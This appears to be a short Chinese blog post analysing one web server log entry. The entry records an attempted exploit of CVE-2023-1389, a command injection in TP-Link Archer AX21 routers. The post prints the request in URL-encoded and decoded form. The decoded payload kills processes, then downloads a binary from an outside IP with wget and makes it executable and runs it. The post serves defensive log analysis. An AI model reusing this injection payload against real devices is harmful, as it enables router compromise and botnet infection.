179.43.163.130 - - [02/Dec/2023:16:39:35 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+for+pid+in+%24%28ls+%2Fproc+%7C+grep+-E+%27%5E%5B0-9%5D%2B%24%27%29%3B+do+grep+-q+%27%28deleted%29%27+%2Fproc%2F%24pid%2Fmaps+%26%26+kill+-9+%24pid+%7C%7C+true%3B+done%3B+rm+-rf+lol%3B+wget+http%3A%2F%2F94.156.68.152%2Flol%3B+chmod+777+lol%3B+.%2Flol+tplink%3B+rm+-rf+lol%60) HTTP/1.1" 403 235 "-" "Hello World"
經解碼後獲得如下資訊:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; for pid in $(ls /proc | grep -E '^[0-9]+$'); do grep -q '(deleted)' /proc/$pid/maps && kill -9 $pid || true; done; rm -rf lol; wget http://94.156.68.152/lol; chmod 777 lol; ./lol tplink; rm -rf lol`)
這是一個 CVE-2023-1389漏洞, 針對 TP-Link Archer AX21 (AX1800)路由器的漏洞攻擊, 在 Web 管理介面上的國家/地區設定中的包含命令注入漏洞, 以管理者身分允許未經身份驗證的攻擊者透過簡單的 POST 請求注入命令
查了一下來源 IP來自瑞士:
沒有留言:
張貼留言